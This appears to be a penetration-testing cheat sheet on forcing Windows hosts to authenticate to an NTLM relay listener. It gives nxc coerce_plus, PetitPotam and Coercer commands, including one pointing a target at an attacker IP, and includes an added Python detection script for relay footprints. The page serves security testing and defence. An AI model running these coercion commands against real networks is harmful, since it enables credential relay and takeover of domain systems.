RPC Coercion

Force a Windows host to authenticate to your NTLM relay listener. The authenticating identity is usually the machine account of the target (e.g., SERVER$), unless the coerced service runs under a domain service account.

  • Typical targets:
    • DCs (for AD CS/LDAPS relay)
    • Servers
    • Workstations
  • SMB relay to DCs is blocked by default (SMB signing is required on DCs). Prefer LDAPS or AD CS as relay targets.
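A defender-side check for the behaviour described above, added here as an example and not taken from the original page: a coerced host shows up on the relay target as a network (type 3) NTLM logon by a machine account such as SERVER$, but sourced from an address that is not that machine's own. The log records, the host-to-IP inventory and the field names are constructed for the example.

```python
# Added example (not from the original page): flag NTLM network logons made by a
# machine account from an address other than the one that machine owns. This is
# the footprint a coerced host leaves on the relay target. All data is constructed.
from dataclasses import dataclass


@dataclass
class Logon:
    event_id: int       # Windows Security event, 4624 = successful logon
    logon_type: int     # 3 = network logon
    auth_package: str   # "NTLM" or "Kerberos"
    account: str        # "SERVER$" for a machine account
    source_ip: str


# Constructed inventory: the address each machine account legitimately uses.
HOST_IPS = {
    "SERVER$": "10.0.0.20",
    "DC01$": "10.0.0.10",
    "WS01$": "10.0.0.50",
}


def is_machine_account(name: str) -> bool:
    return name.endswith("$")


def suspicious_logons(events, host_ips=HOST_IPS):
    """Return logons that look like relayed machine-account NTLM authentication."""
    hits = []
    for e in events:
        if e.event_id != 4624 or e.logon_type != 3:
            continue
        if e.auth_package.upper() != "NTLM":      # Kerberos logons are not relayed this way
            continue
        if not is_machine_account(e.account):
            continue
        expected = host_ips.get(e.account)
        if expected is not None and e.source_ip != expected:
            hits.append(e)
    return hits


SAMPLE = [  # constructed sample records
    Logon(4624, 3, "NTLM", "SERVER$", "10.0.0.20"),    # SERVER$ from its own address: normal
    Logon(4624, 3, "NTLM", "SERVER$", "10.0.0.99"),    # SERVER$ from elsewhere: relay footprint
    Logon(4624, 3, "Kerberos", "DC01$", "10.0.0.99"),  # Kerberos, ignored
    Logon(4624, 3, "NTLM", "jdoe", "10.0.0.99"),       # user account, out of scope here
]

if __name__ == "__main__":
    for h in suspicious_logons(SAMPLE):
        print(f"ALERT {h.account} NTLM logon from {h.source_ip}, expected {HOST_IPS[h.account]}")
```

Machine accounts with no inventory entry are skipped rather than alerted, so the inventory should be complete for the hosts you care about.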

Tools

nxc

nxc smb coerce_plus module
nxc smb <smb_server_to_coerce> -u <username> -p <password> -d <domain> -M coerce_plus -o LISTENER=<attacker_ip>

Attempts coercion against a variety of RPC interfaces.

nxc smb petitpotam module
nxc smb <smb_server_to_coerce> -M petitpotam

Tests whether the host is vulnerable to PetitPotam.

Petitpotam

Attempts coercion against a hardcoded set of EFSRPC methods.

Coercer

coercer scan

Only attempts RPC interfaces advertised by the endpoint mapper (EPM).

coercer fuzz

Checks coercion against every RPC interface Coercer knows about.

Attack Paths - If coercion is successful